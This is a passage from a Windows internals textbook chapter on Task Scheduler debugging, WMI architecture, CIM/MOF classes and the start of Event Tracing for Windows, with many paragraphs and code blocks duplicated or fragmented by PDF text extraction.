04 000000a7`01a7fb60 00007ffa`39487bd4 taskhostw!__wmainCRTStartup+0x1c9
05 000000a7`01a7fc20 00007ffa`39aeced1 KERNEL32!BaseThreadInitThunk+0x14
06 000000a7`01a7fc50 00000000`00000000 ntdll!RtlUserThreadStart+0x21
15. The stack shows that the task host client has just been spawned by UBPM and has re-
ceived the Start command requesting to start a task.
16. In the Windbg console, insert the ~. command and press Enter. Note the current execut-
ing thread ID.
17. You should now put a breakpoint on the CoCreateInstance COM API and resume the
execution, using the following commands:
bp combase!CoCreateInstance
g
18. After the debugger breaks, again insert the ~. command in the Windbg console, press
Enter, and note that the thread ID has completely changed.
19. This demonstrates that the task host client has created a new thread for executing the
task entry point. The documented CoCreateInstance function is used for creating a single
COM object of the class associated with a particular CLSID, specified as a parameter. Two
GUIDs are interesting for this experiment: the GUID of the COM class that represents the
Task and the interface ID of the interface implemented by the COM object.
9.
Name the new registry value as EnableDebuggerBreakForTaskStart. To enable the initial
task breakpoint, you should insert the full path of the task. In this case, the full path is
\Microsoft\Windows\Wininet\CacheTask. In the previous experiment, the task path has
been referred as the task’s URI.
10. Close the Registry Editor and switch back to the Task Scheduler.
11. Right-click the CacheTask task and select Run.
12. If you have configured everything correctly, a new WinDbg window should appear.
13. Configure the symbols used by the debugger by selecting the Symbol File Path item
from the File menu and by inserting a valid path to the Windows symbol server (see
https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/ microsoft-
public-symbols for more details).
14. You should be able to peek at the call stack of the Taskhostw.exe process just before
it was interrupted using the k command:
k command:
k
0:000> k
# Child-SP
RetAddr
Call Site
00 000000a7`01a7f610 00007ff6`0b0337a8 taskhostw!ComTaskMgrBase::[ComTaskMgr]::Sta
rtComTask+0x2c4
01 000000a7`01a7f960 00007ff6`0b033621 taskhostw!StartComTask+0x58
02 000000a7`01a7f9d0 00007ff6`0b033191 taskhostw!UbpmTaskHostWaitForCommands+0x2d1
3 000000a7`01a7fb00 00007ff6`0b035659 taskhostw!wWinMain+0xc1
04 000000a7`01a7fb60 00007ffa`39487bd4 taskhostw!__wmainCRTStartup+0x1c9
05 000000a7`01a7fc20 00007ffa`39aeced1 KERNEL32!BaseThreadInitThunk+0x14
06 000000a7`01a7fc50 00000000`00000000 ntdll!RtlUserThreadStart+0x21
15. The stack shows that the task host client has just been spawned by UBPM and has re-
ceived the Start command requesting to start a task.
16. In the Windbg console, insert the ~. command and press Enter. Note the current execut-
ing thread ID.
17. You should now put a breakpoint on the CoCreateInstance COM API and resume the
execution, using the following commands:
bp combase!CoCreateInstance
g
18. After the debugger breaks, again insert the ~. command in the Windbg console, press
Enter, and note that the thread ID has completely changed.
19. This demonstrates that the task host client has created a new thread for executing the
task entry point. The documented CoCreateInstance function is used for creating a single
COM object of the class associated with a particular CLSID, specified as a parameter. Two
GUIDs are interesting for this experiment: the GUID of the COM class that represents the
Task and the interface ID of the interface implemented by the COM object.
486
CHAPTER 10 Management, diagnostics, and tracing
20. In 64-bit systems, the calling convention defines that the first four function parameters
are passed through registers, so it is easy to extract those GUIDs:
0:004> dt combase!CLSID @rcx
{0358b920-0ac7-461f-98f4-58e32cd89148}
+0x000 Data1
: 0x358b920
+0x004 Data2
: 0xac7
+0x006 Data3
: 0x461f
+0x008 Data4
: [8] "???"
0:004> dt combase!IID @r9
{839d7762-5121-4009-9234-4f0d19394f04}
+0x000 Data1 : 0x839d7762
+0x004 Data2
: 0x5121
+0x006 Data3
: 0x4009
+0x008 Data4
: [8] "???"
As you can see from the preceding output, the COM server CLSID is {0358b920-0ac7-461f-
98f4-58e32cd89148}. You can verify that it corresponds to the GUID of the only COM action
located in the XML descriptor of the “CacheTask” task (see the previous experiment for details).
The requested interface ID is “{839d7762-5121-4009-9234-4f0d19394f04}”, which correspond to
the GUID of the COM task handler action interface (ITaskHandler).
Task Scheduler COM interfaces
As we have discussed in the previous section, a COM task should adhere to a well-defined interface,
which is used by UBPM to manage the state transition of the task. While UBPM decides when to start
the task and manages all of its state, all the other interfaces used to register, remove, or just manually
start and stop a task are implemented by the Task Scheduler in its client-side DLL (Taskschd.dll).
ITaskService is the central interface by which clients can connect to the Task Scheduler and perform
multiple operations, like enumerate registered tasks; get an instance of the Task store (represented by
the ITaskFolder COM interface); and enable, disable, delete, or register a task and all of its associated
triggers and actions (by using the ITaskDefinition COM interface). When a client application invokes for
the first time a Task Scheduler APIs through COM, the system loads the Task Scheduler client-side DLL
(Taskschd.dll) into the client process’s address space (as dictated by the COM contract: Task Scheduler
COM objects live in an in-proc COM server). The COM APIs are implemented by routing requests
through RPC calls into the Task Scheduler service, which processes each request and forwards it to
UBPM if needed. The Task Scheduler COM architecture allows users to interact with it via scripting
languages like PowerShell (through the ScheduledTasks cmdlet) or VBScript.
Windows Management Instrumentation
Windows Management Instrumentation (WMI) is an implementation of Web-Based Enterprise
Management (WBEM), a standard that the Distributed Management Task Force (DMTF—an indus-
try consortium) defines. The WBEM standard encompasses the design of an extensible enterprise
20. In 64-bit systems, the calling convention defines that the first four function parameters
are passed through registers, so it is easy to extract those GUIDs:
0:004> dt combase!CLSID @rcx
{0358b920-0ac7-461f-98f4-58e32cd89148}
+0x000 Data1
: 0x358b920
+0x004 Data2
: 0xac7
+0x006 Data3
: 0x461f
+0x008 Data4
: [8] "???"
0:004> dt combase!IID @r9
{839d7762-5121-4009-9234-4f0d19394f04}
+0x000 Data1 : 0x839d7762
+0x004 Data2
: 0x5121
+0x006 Data3
: 0x4009
+0x008 Data4
: [8] "???"
As you can see from the preceding output, the COM server CLSID is {0358b920-0ac7-461f-
98f4-58e32cd89148}. You can verify that it corresponds to the GUID of the only COM action
located in the XML descriptor of the “CacheTask” task (see the previous experiment for details).
The requested interface ID is “{839d7762-5121-4009-9234-4f0d19394f04}”, which correspond to
the GUID of the COM task handler action interface (ITaskHandler).
ITaskHandler).
ITaskHandler
CHAPTER 10 Management, diagnostics, and tracing
487
data-collection and data-management facility that has the flexibility and extensibility required to man-
age local and remote systems that comprise arbitrary components.
WMI architecture
WMI consists of four main components, as shown in Figure 10-27: management applications, WMI
infrastructure, providers, and managed objects. Management applications are Windows applications
that access and display or process data about managed objects. A simple example of a management
application is a performance tool replacement that relies on WMI rather than the Performance API to
obtain performance information. A more complex example is an enterprise-management tool that lets
administrators perform automated inventories of the software and hardware configuration of every
computer in their enterprise.
Database
application
Windows Management API
CIM repository
CIM Object Manager (CIMOM)
ODBC
SNM
provider
SNMP
objects
Windows
provider
Windows
objects
Registry
provider
Registry
objects
VbScript/
Perl
ActiveX
controls
.NET
application
C/C++
application
Windows
PowerShell
Management
applications
WMI infrastructure
COM/DCOM
COM/DCOM
Providers
Managed objects
FIGURE 10-27 WMI architecture.
Developers typically must target management applications to collect data from and manage
specific objects. An object might represent one component, such as a network adapter device, or a col-
lection of components, such as a computer. (The computer object might contain the network adapter
object.) Providers need to define and export the representation of the objects that management ap-
plications are interested in. For example, the vendor of a network adapter might want to add adapter-
specific properties to the network adapter WMI support that Windows includes, querying and setting
the adapter’s state and behavior as the management applications direct. In some cases (for example,
for device drivers), Microsoft supplies a provider that has its own API to help developers leverage the
provider’s implementation for their own managed objects with minimal coding effort.
488
CHAPTER 10 Management, diagnostics, and tracing
The WMI infrastructure, the heart of which is the Common Information Model (CIM) Object
Manager (CIMOM), is the glue that binds management applications and providers. (CIM is described
later in this chapter.) The infrastructure also serves as the object-class store and, in many cases, as
the storage manager for persistent object properties. WMI implements the store, or repository, as an
on-disk database named the CIMOM Object Repository. As part of its infrastructure, WMI supports
several APIs through which management applications access object data and providers supply data
and class definitions.
Windows programs and scripts (such as Windows PowerShell) use the WMI COM API, the primary
management API, to directly interact with WMI. Other APIs layer on top of the COM API and include an
Open Database Connectivity (ODBC) adapter for the Microsoft Access database application. A data-
base developer uses the WMI ODBC adapter to embed references to object data in the developer’s da-
tabase. Then the developer can easily generate reports with database queries that contain WMI-based
data. WMI ActiveX controls support another layered API. Web developers use the ActiveX controls to
construct web-based interfaces to WMI data. Another management API is the WMI scripting API, for
use in script-based applications (like Visual Basic Scripting Edition). WMI scripting support exists for all
Microsoft programming language technologies.
Because WMI COM interfaces are for management applications, they constitute the primary API
for providers. However, unlike management applications, which are COM clients, providers are COM
or Distributed COM (DCOM) servers (that is, the providers implement COM objects that WMI interacts
with). Possible embodiments of a WMI provider include DLLs that load into a WMI’s manager process
or stand-alone Windows applications or Windows services. Microsoft includes a number of built-in
providers that present data from well-known sources, such as the Performance API, the registry, the
Event Manager, Active Directory, SNMP, and modern device drivers. The WMI SDK lets developers
develop third-party WMI providers.
WMI providers
At the core of WBEM is the DMTF-designed CIM specification. The CIM specifies how management
systems represent, from a systems management perspective, anything from a computer to an applica-
tion or device on a computer. Provider developers use the CIM to represent the components that make
up the parts of an application for which the developers want to enable management. Developers use
the Managed Object Format (MOF) language to implement a CIM representation.
In addition to defining classes that represent objects, a provider must interface WMI to the objects.
WMI classifies providers according to the interface features the providers supply. Table 10-14 lists WMI
provider classifications. Note that a provider can implement one or more features; therefore, a provider
can be, for example, both a class and an event provider. To clarify the feature definitions in Table 10-14,
let’s look at a provider that implements several of those features. The Event Log provider supports
several objects, including an Event Log Computer, an Event Log Record, and an Event Log File. The
Event Log is an Instance provider because it can define multiple instances for several of its classes. One
class for which the Event Log provider defines multiple instances is the Event Log File class (Win32_
NTEventlogFile); the Event Log provider defines an instance of this class for each of the system’s event
logs (that is, System Event Log, Application Event Log, and Security Event Log).
CHAPTER 10 Management, diagnostics, and tracing
489
TABLE 10-14 Provider classifications
Classification
Description
Class
Can supply, modify, delete, and enumerate a provider-specific class. It can also support query
processing. Active Directory is a rare example of a service that is a class provider.
Instance
Can supply, modify, delete, and enumerate instances of system and provider-specific classes.
An instance represents a managed object. It can also support query processing.
Property
Can supply and modify individual object property values.
Method
Supplies methods for a provider-specific class.
Event
Generates event notifications.
Event consumer
Maps a physical consumer to a logical consumer to support event notification.
The Event Log provider defines the instance data and lets management applications enumerate the
records. To let management applications use WMI to back up and restore the Event Log files, the Event
Log provider implements backup and restore methods for Event Log File objects. Doing so makes the
Event Log provider a Method provider. Finally, a management application can register to receive noti-
fication whenever a new record writes to one of the Event Logs. Thus, the Event Log provider serves as
an Event provider when it uses WMI event notification to tell WMI that Event Log records have arrived.
The Common Information Model and the Managed Object
Format Language
The CIM follows in the steps of object-oriented languages such as C++ and C, in which a modeler
designs representations as classes. Working with classes lets developers use the powerful modeling
techniques of inheritance and composition. Subclasses can inherit the attributes of a parent class, and
they can add their own characteristics and override the characteristics they inherit from the parent
class. A class that inherits properties from another class derives from that class. Classes also compose: a
developer can build a class that includes other classes. CIM classes consist of properties and methods.
Properties describe the configuration and state of a WMI-managed resource, and methods are execut-
able functions that perform actions on the WMI-managed resource.
The DMTF provides multiple classes as part of the WBEM standard. These classes are CIM’s basic
language and represent objects that apply to all areas of management. The classes are part of the
CIM core model. An example of a core class is CIM_ManagedSystemElement. This class contains a
few basic properties that identify physical components such as hardware devices and logical compo-
nents such as processes and files. The properties include a caption, description, installation date, and
status. Thus, the CIM_LogicalElement and CIM_PhysicalElement classes inherit the attributes of the
CIM_ManagedSystemElement class. These two classes are also part of the CIM core model. The WBEM
standard calls these classes abstract classes because they exist solely as classes that other classes inherit
(that is, no object instances of an abstract class exist). You can therefore think of abstract classes as tem-
plates that define properties for use in other classes.
A second category of classes represents objects that are specific to management areas but indepen-
dent of a particular implementation. These classes constitute the common model and are considered
an extension of the core model. An example of a common-model class is the CIM_FileSystem class,
490
CHAPTER 10 Management, diagnostics, and tracing
which inherits the attributes of CIM_LogicalElement. Because virtually every operating system—includ-
ing Windows, Linux, and other varieties of UNIX—rely on file system–based structured storage, the
CIM_FileSystem class is an appropriate constituent of the common model.
The final class category, the extended model, comprises technology-specific additions to the
common model. Windows defines a large set of these classes to represent objects specific to the
Windows environment. Because all operating systems store data in files, the CIM model includes the
CIM_LogicalFile class. The CIM_DataFile class inherits the CIM_LogicalFile class, and Windows adds the
Win32_PageFile and Win32_ShortcutFile file classes for those Windows file types.
Windows includes different WMI management applications that allow an administrator to inter-
act with WMI namespaces and classes. The WMI command-line utility (WMIC.exe) and Windows
PowerShell are able to connect to WMI, execute queries, and invoke WMI class object methods.
Figure 10-28 shows a PowerShell window extracting information of the Win32_NTEventlogFile class,
part of the Event Log provider. This class makes extensive use of inheritance and derives from CIM_
DataFile. Event Log files are data files that have additional Event Log–specific attributes such as a log
file name (LogfileName) and a count of the number of records that the file contains (NumberOfRecords).
The Win32_NTEventlogFile is based on several levels of inheritance, in which CIM_DataFile derives
from CIM_LogicalFile, which derives from CIM_LogicalElement, and CIM_LogicalElement derives from
CIM_ManagedSystemElement.
FIGURE 10-28 Windows PowerShell extracting information from the Win32_NTEventlogFile class.
CHAPTER 10 Management, diagnostics, and tracing
491
As stated earlier, WMI provider developers write their classes in the MOF language. The following
output shows the definition of the Event Log provider’s Win32_NTEventlogFile, which has been queried
in Figure 10-28:
[dynamic: ToInstance, provider("MS_NT_EVENTLOG_PROVIDER"): ToInstance, SupportsUpdate,
Locale(1033): ToInstance, UUID("{8502C57B-5FBB-11D2-AAC1-006008C78BC7}"): ToInstance]
class Win32_NTEventlogFile : CIM_DataFile
{
[Fixed: ToSubClass, read: ToSubClass] string LogfileName;
[read: ToSubClass, write: ToSubClass] uint32 MaxFileSize;
[read: ToSubClass] uint32 NumberOfRecords;
[read: ToSubClass, volatile: ToSubClass, ValueMap{"0", "1..365", "4294967295"}:
ToSubClass] string OverWritePolicy;
[read: ToSubClass, write: ToSubClass, Range("0-365 | 4294967295"): ToSubClass]
uint32 OverwriteOutDated;
[read: ToSubClass] string Sources[];
[ValueMap{"0", "8", "21", ".."}: ToSubClass, implemented, Privileges{
"SeSecurityPrivilege", "SeBackupPrivilege"}: ToSubClass]
uint32 ClearEventlog([in] string ArchiveFileName);
[ValueMap{"0", "8", "21", "183", ".."}: ToSubClass, implemented, Privileges{
"SeSecurityPrivilege", "SeBackupPrivilege"}: ToSubClass]
uint32 BackupEventlog([in] string ArchiveFileName);
};
One term worth reviewing is dynamic, which is a descriptive designator for the Win32_NTEventlogFile
class that the MOF file in the preceding output shows. Dynamic means that the WMI infrastructure
asks the WMI provider for the values of properties associated with an object of that class whenever a
management application queries the object’s properties. A static class is one in the WMI repository; the
WMI infrastructure refers to the repository to obtain the values instead of asking a provider for the val-
ues. Because updating the repository is a relatively expensive operation, dynamic providers are more
efficient for objects that have properties that change frequently.
EXPERIMENT: Viewing the MOF definitions of WMI classes
You can view the MOF definition for any WMI class by using the Windows Management
Instrumentation Tester tool (WbemTest) that comes with Windows. In this experiment, we
look at the MOF definition for the Win32_NTEventLogFile class:
1.
Type Wbemtest in the Cortana search box and press Enter. The Windows Management
Instrumentation Tester should open.
2.
Click the Connect button, change the Namespace to root\cimv2, and connect. The tool
should enable all the command buttons, as shown in the following figure:
EXPERIMENT: Viewing the MOF definitions of WMI classes
You can view the MOF definition for any WMI class by using the Windows Management
Instrumentation Tester tool (WbemTest) that comes with Windows. In this experiment, we
look at the MOF definition for the Win32_NTEventLogFile class:
1.
Type Wbemtest in the Cortana search box and press Enter. The Windows Management
Instrumentation Tester should open.
2.
Click the Connect button, change the Namespace to root\cimv2, and connect. The tool
should enable all the command buttons, as shown in the following figure:
492
CHAPTER 10 Management, diagnostics, and tracing
3.
Click the Enum Classes button, select the Recursive option button, and then click OK.
4.
Find Win32_NTEventLogFile in the list of classes, and then double-click it to see its class
properties.
5.
Click the Show MOF button to open a window that displays the MOF text.
After constructing classes in MOF, WMI developers can supply the class definitions to WMI in several
ways. WDM driver developers compile a MOF file into a binary MOF (BMF) file—a more compact
binary representation than an MOF file—and can choose to dynamically give the BMF files to the WDM
infrastructure or to statically include it in their binary. Another way is for the provider to compile the
MOF and use WMI COM APIs to give the definitions to the WMI infrastructure. Finally, a provider can
use the MOF Compiler (Mofcomp.exe) tool to give the WMI infrastructure a classes-compiled represen-
tation directly.
Note Previous editions of Windows (until Windows 7) provided a graphical tool, called
WMI CIM Studio, shipped with the WMI Administrative Tool. The tool was able to graphi-
cally show WMI namespaces, classes, properties, and methods. Nowadays, the tool is not
supported or available for download because it was superseded by the WMI capacities of
Windows PowerShell. PowerShell is a scripting language that does not run with a GUI. Some
third-party tools present a similar interface of CIM Studio. One of them is WMI Explorer,
which is downloadable from https://github.com/vinaypamnani/wmie2/releases.
3.
Click the Enum Classes button, select the Recursive option button, and then click OK.
4.
Find Win32_NTEventLogFile in the list of classes, and then double-click it to see its class
properties.
5.
Click the Show MOF button to open a window that displays the MOF text.
CHAPTER 10 Management, diagnostics, and tracing
493
The Common Information Model (CIM) repository is stored in the %SystemRoot%\System32\wbem\
Repository path and includes the following:
I
Index.btr Binary-tree (btree) index file
I
MappingX.map Transaction control files (X is a number starting from 1)
I
Objects.data CIM repository where managed resource definitions are stored
The WMI namespace
Classes define objects, which are provided by a WMI provider. Objects are class instances on a sys-
tem. WMI uses a namespace that contains several subnamespaces that WMI arranges hierarchically to
organize objects. A management application must connect to a namespace before the application can
access objects within the namespace.
WMI names the namespace root directory ROOT. All WMI installations have four predefined
namespaces that reside beneath root: CIMV2, Default, Security, and WMI. Some of these namespaces
have other namespaces within them. For example, CIMV2 includes the Applications and ms_409
namespaces as subnamespaces. Providers sometimes define their own namespaces; you can see the
WMI namespace (which the Windows device driver WMI provider defines) beneath ROOT in Windows.
Unlike a file system namespace, which comprises a hierarchy of directories and files, a WMI
namespace is only one level deep. Instead of using names as a file system does, WMI uses object
properties that it defines as keys to identify the objects. Management applications specify class names
with key names to locate specific objects within a namespace. Thus, each instance of a class must be
uniquely identifiable by its key values. For example, the Event Log provider uses the Win32_NTLogEvent
class to represent records in an Event Log. This class has two keys: Logfile, a string; and RecordNumber,
an unsigned integer. A management application that queries WMI for instances of Event Log records
obtains them from the provider key pairs that identify records. The application refers to a record using
the syntax that you see in this sample object path name:
\\ANDREA-LAPTOP\root\CIMV2:Win32_NTLogEvent.Logfile="Application",
RecordNumber="1"
The first component in the name (\\ANDREA-LAPTOP) identifies the computer on which the object
is located, and the second component (\root\CIMV2) is the namespace in which the object resides. The
class name follows the colon, and key names and their associated values follow the period. A comma
separates the key values.
WMI provides interfaces that let applications enumerate all the objects in a particular class or to
make queries that return instances of a class that match a query criterion.
Class association
Many object types are related to one another in some way. For example, a computer object has a
processor, software, an operating system, active processes, and so on. WMI lets providers construct an
association class to represent a logical connection between two different classes. Association classes
494
CHAPTER 10 Management, diagnostics, and tracing
associate one class with another, so the classes have only two properties: a class name and the Ref
modifier. The following output shows an association in which the Event Log provider’s MOF file associ-
ates the Win32_NTLogEvent class with the Win32_ComputerSystem class. Given an object, a manage-
ment application can query associated objects. In this way, a provider defines a hierarchy of objects.
[dynamic: ToInstance, provider("MS_NT_EVENTLOG_PROVIDER"): ToInstance, EnumPrivileges{"SeSe
curityPrivilege"}: ToSubClass, Privileges{"SeSecurityPrivilege"}: ToSubClass, Locale(1033):
ToInstance, UUID("{8502C57F-5FBB-11D2-AAC1-006008C78BC7}"): ToInstance, Association:
DisableOverride ToInstance ToSubClass]
class Win32_NTLogEventComputer
{
[key, read: ToSubClass] Win32_ComputerSystem ref Computer;
[key, read: ToSubClass] Win32_NTLogEvent ref Record;
};
Figure 10-29 shows a PowerShell window displaying the first Win32_NTLogEventComputer class
instance located in the CIMV2 namespace. From the aggregated class instance, a user can query the as-
sociated Win32_ComputerSystem object instance WIN-46E4EFTBP6Q, which generated the event with
record number 1031 in the Application log file.
FIGURE 10-29 The Win32_NTLogEventComputer association class.
CHAPTER 10 Management, diagnostics, and tracing
495
EXPERIMENT: Using WMI scripts to manage systems
A powerful aspect of WMI is its support for scripting languages. Microsoft has generated hun-
dreds of scripts that perform common administrative tasks for managing user accounts, files, the
registry, processes, and hardware devices. The Microsoft TechNet Scripting Center website serves
as the central location for Microsoft scripts. Using a script from the scripting center is as easy as
copying its text from your Internet browser, storing it in a file with a .vbs extension, and running
it with the command cscript script.vbs, where script is the name you gave the script.
Cscript is the command-line interface to Windows Script Host (WSH).
Here’s a sample TechNet script that registers to receive events when Win32_Process object
instances are created, which occur whenever a process starts and prints a line with the name of
the process that the object represents:
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colMonitoredProcesses = objWMIService. _
ExecNotificationQuery("SELECT * FROM __InstanceCreationEvent " _
& " WITHIN 1 WHERE TargetInstance ISA 'Win32_Process'")
i = 0
Do While i = 0
Set objLatestProcess = colMonitoredProcesses.NextEvent
Wscript.Echo objLatestProcess.TargetInstance.Name
Loop
The line that invokes ExecNotificationQuery does so with a parameter that includes a select
statement, which highlights WMI’s support for a read-only subset of the ANSI standard Structured
Query Language (SQL), known as WQL, to provide a flexible way for WMI consumers to specify the
information they want to extract from WMI providers. Running the sample script with Cscript and
then starting Notepad results in the following output:
C:\>cscript monproc.vbs
Microsoft (R) Windows Script Host Version 5.812
Copyright (C) Microsoft Corporation. All rights reserved.
NOTEPAD.EXE
PowerShell supports the same functionality through the Register-WmiEvent and Get-Event
commands:
PS C:\> Register-WmiEvent -Query “SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE
TargetInstance ISA 'Win32_Process'” -SourceIdentifier “TestWmiRegistration”
PS C:\> (Get-Event)[0].SourceEventArgs.NewEvent.TargetInstance | Select-Object -Property
ProcessId, ExecutablePath
ProcessId ExecutablePath
--------- --------------
76016 C:\WINDOWS\system32\notepad.exe
PS C:\> Unregister-Event -SourceIdentifier "TestWmiRegistration"
EXPERIMENT: Using WMI scripts to manage systems
A powerful aspect of WMI is its support for scripting languages. Microsoft has generated hun-
dreds of scripts that perform common administrative tasks for managing user accounts, files, the
registry, processes, and hardware devices. The Microsoft TechNet Scripting Center website serves
as the central location for Microsoft scripts. Using a script from the scripting center is as easy as
copying its text from your Internet browser, storing it in a file with a .vbs extension, and running
it with the command cscript script.vbs, where script is the name you gave the script.
Cscript is the command-line interface to Windows Script Host (WSH).
Here’s a sample TechNet script that registers to receive events when Win32_Process object
instances are created, which occur whenever a process starts and prints a line with the name of
the process that the object represents:
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colMonitoredProcesses = objWMIService. _
ExecNotificationQuery("SELECT * FROM __InstanceCreationEvent " _
& " WITHIN 1 WHERE TargetInstance ISA 'Win32_Process'")
i = 0
Do While i = 0
Set objLatestProcess = colMonitoredProcesses.NextEvent
Wscript.Echo objLatestProcess.TargetInstance.Name
Loop
The line that invokes ExecNotificationQuery does so with a parameter that includes a
ExecNotificationQuery does so with a parameter that includes a
ExecNotificationQuery
select
statement, which highlights WMI’s support for a read-only subset of the ANSI standard Structured
Query Language (SQL), known as WQL, to provide a flexible way for WMI consumers to specify the
information they want to extract from WMI providers. Running the sample script with Cscript and
then starting Notepad results in the following output:
C:\>cscript monproc.vbs
Microsoft (R) Windows Script Host Version 5.812
Copyright (C) Microsoft Corporation. All rights reserved.
NOTEPAD.EXE
PowerShell supports the same functionality through the Register-WmiEvent and Get-Event
commands:
PS C:\> Register-WmiEvent -Query “SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE
TargetInstance ISA 'Win32_Process'” -SourceIdentifier “TestWmiRegistration”
PS C:\> (Get-Event)[0].SourceEventArgs.NewEvent.TargetInstance | Select-Object -Property
ProcessId, ExecutablePath
ProcessId ExecutablePath
--------- --------------
76016 C:\WINDOWS\system32\notepad.exe
PS C:\> Unregister-Event -SourceIdentifier "TestWmiRegistration"
496
CHAPTER 10 Management, diagnostics, and tracing
WMI implementation
The WMI service runs in a shared Svchost process that executes in the local system account. It loads
providers into the WmiPrvSE.exe provider-hosting process, which launches as a child of the DCOM
Launcher (RPC service) process. WMI executes Wmiprvse in the local system, local service, or network
service account, depending on the value of the HostingModel property of the WMI Win32Provider ob-
ject instance that represents the provider implementation. A Wmiprvse process exits after the provider
is removed from the cache, one minute following the last provider request it receives.
EXPERIMENT: Viewing Wmiprvse creation
You can see WmiPrvSE being created by running Process Explorer and executing Wmic. A
WmiPrvSE process will appear beneath the Svchost process that hosts the DCOM Launcher
service. If Process Explorer job highlighting is enabled, it will appear with the job highlight color
because, to prevent a runaway provider from consuming all virtual memory resources on a
system, Wmiprvse executes in a job object that limits the number of child processes it can create
and the amount of virtual memory each process and all the processes of the job can allocate.
(See Chapter 5 for more information on job objects.)
Most WMI components reside by default in %SystemRoot%\System32 and %SystemRoot%\System32\
Wbem, including Windows MOF files, built-in provider DLLs, and management application WMI DLLs.
Look in the %SystemRoot%\System32\Wbem directory, and you’ll find Ntevt.mof, the Event Log provider
MOF file. You’ll also find Ntevt.dll, the Event Log provider’s DLL, which the WMI service uses.
EXPERIMENT: Viewing Wmiprvse creation
You can see WmiPrvSE being created by running Process Explorer and executing Wmic. A
WmiPrvSE process will appear beneath the Svchost process that hosts the DCOM Launcher
service. If Process Explorer job highlighting is enabled, it will appear with the job highlight color
because, to prevent a runaway provider from consuming all virtual memory resources on a
system, Wmiprvse executes in a job object that limits the number of child processes it can create
and the amount of virtual memory each process and all the processes of the job can allocate.
(See Chapter 5 for more information on job objects.)
CHAPTER 10 Management, diagnostics, and tracing
497
Providers are generally implemented as dynamic link libraries (DLLs) exposing COM servers that
implement a specified set of interfaces (IWbemServices is the central one. Generally, a single provider is
implemented as a single COM server). WMI includes many built-in providers for the Windows family of
operating systems. The built-in providers, also known as standard providers, supply data and manage-
ment functions from well-known operating system sources such as the Win32 subsystem, event logs,
performance counters, and registry. Table 10-15 lists several of the standard WMI providers included
with Windows.
TABLE 10-15 Standard WMI providers included with Windows
Provider
Binary
Namespace
Description
Active Directory
provider
dsprov.dll
root\directory\ldap
Maps Active Directory objects to WMI
Event Log provider
ntevt.dll
root\cimv2
Manages Windows event logs—for example, read,
backup, clear, copy, delete, monitor, rename, com-
press, uncompress, and change event log settings
Performance Counter
provider
wbemperf.dll
root\cimv2
Provides access to raw performance data
Registry provider
stdprov.dll
root\default
Reads, writes, enumerates, monitors, creates, and
deletes registry keys and values
Virtualization
provider
vmmsprox.dll
root\virtualization\v2
Provides access to virtualization services implemented
in vmms.exe, like managing virtual machines in the
host system and retrieving information of the host
system peripherals from a guest VM
WDM provider
wmiprov.dll
root\wmi
Provides access to information on WDM device drivers
Win32 provider
cimwin32.dll
root\cimv2
Provides information about the computer, disks, pe-
ripheral devices, files, folders, file systems, networking
components, operating system, printers, processes,
security, services, shares, SAM users and groups, and
more
Windows Installer
provider
msiprov.dll
root\cimv2
Provides access to information about installed
software
Ntevt.dll, the Event Log provider DLL, is a COM server, registered in the HKLM\Software\Classes\
CLSID registry key with the {F55C5B4C-517D-11d1-AB57-00C04FD9159E} CLSID. (You can find it in the
MOF descriptor.) Directories beneath %SystemRoot%\System32\Wbem store the repository, log files,
and third-party MOF files. WMI implements the repository—named the CIMOM object repository—
using a proprietary version of the Microsoft JET database engine. The database file, by default, resides
in SystemRoot%\System32\Wbem\Repository\.
WMI honors numerous registry settings that the service’s HKLM\SOFTWARE\Microsoft\WBEM\
CIMOM registry key stores, such as thresholds and maximum values for certain parameters.
Device drivers use special interfaces to provide data to and accept commands—called the WMI
System Control commands—from WMI. These interfaces are part of the WDM, which is explained in
Chapter 6 of Part 1. Because the interfaces are cross-platform, they fall under the \root\WMI namespace.
498
CHAPTER 10 Management, diagnostics, and tracing
WMI security
WMI implements security at the namespace level. If a management application successfully connects
to a namespace, the application can view and access the properties of all the objects in that namespace.
An administrator can use the WMI Control application to control which users can access a namespace.
Internally, this security model is implemented by using ACLs and Security Descriptors, part of the
standard Windows security model that implements Access Checks. (See Chapter 7 of Part 1 for more
information on access checks.)
To start the WMI Control application, open the Control Panel by typing Computer Management
in the Cortana search box. Next, open the Services And Applications node. Right-click WMI Control
and select Properties to launch the WMI Control Properties dialog box, as shown in Figure 10-30. To
configure security for namespaces, click the Security tab, select the namespace, and click Security.
The other tabs in the WMI Control Properties dialog box let you modify the performance and backup
settings that the registry stores.
FIGURE 10-30 The WMI Control Properties application and the Security tab of the root\virtualization\v2 namespace.
CHAPTER 10 Management, diagnostics, and tracing
499
Event Tracing for Windows (ETW)
Event Tracing for Windows (ETW) is the main facility that provides to applications and kernel-mode
drivers the ability to provide, consume, and manage log and trace events. The events can be stored in
a log file or in a circular buffer, or they can be consumed in real time. They can be used for debugging
a driver, a framework like the .NET CLR, or an application and to understand whether there could be
potential performance issues. The ETW facility is mainly implemented in the NT kernel, but an applica-
tion can also use private loggers, which do not transition to kernel-mode at all. An application that uses
ETW can be one of the following categories:
I
Controller A controller starts and stops event tracing sessions, manages the size of the buffer
pools, and enables providers so they can log events to the session. Example controllers include
Reliability and Performance Monitor and XPerf from the Windows Performance Toolkit (now
part of the Windows Assessment and Deployment Kit, available for download from https://docs.
microsoft.com/en-us/windows-hardware/get-started/adk-install).
I
Provider A provider is an application or a driver that contains event tracing instrumentation.
A provider registers with ETW a provider GUID (globally unique identifiers), which defines the
events it can produce. After the registration, the provider can generate events, which can be
enabled or disabled by the controller application through an associated trace session.
I
Consumer A consumer is an application that selects one or more trace sessions for which it
wants to read trace data. Consumers can receive events stored in log files, in a circular buffer,
or from sessions that deliver events in real time.
It’s important to mention that in ETW, every provider, session, trait, and provider’s group is rep-
resented by a GUID (more information about these concepts are provided later in this chapter). Four
different technologies used for providing events are built on the top of ETW. They differ mainly in the
method in which they store and define events (there are other distinctions though):
I
MOF (or classic) providers are the legacy ones, used especially by WMI. MOF providers store the
events descriptor in MOF classes so that the consumer knows how to consume them.
I
WPP (Windows software trace processor) providers are used for tracing the operations of an
application or driver (they are an extension of WMI event tracing) and use a TMF (trace message
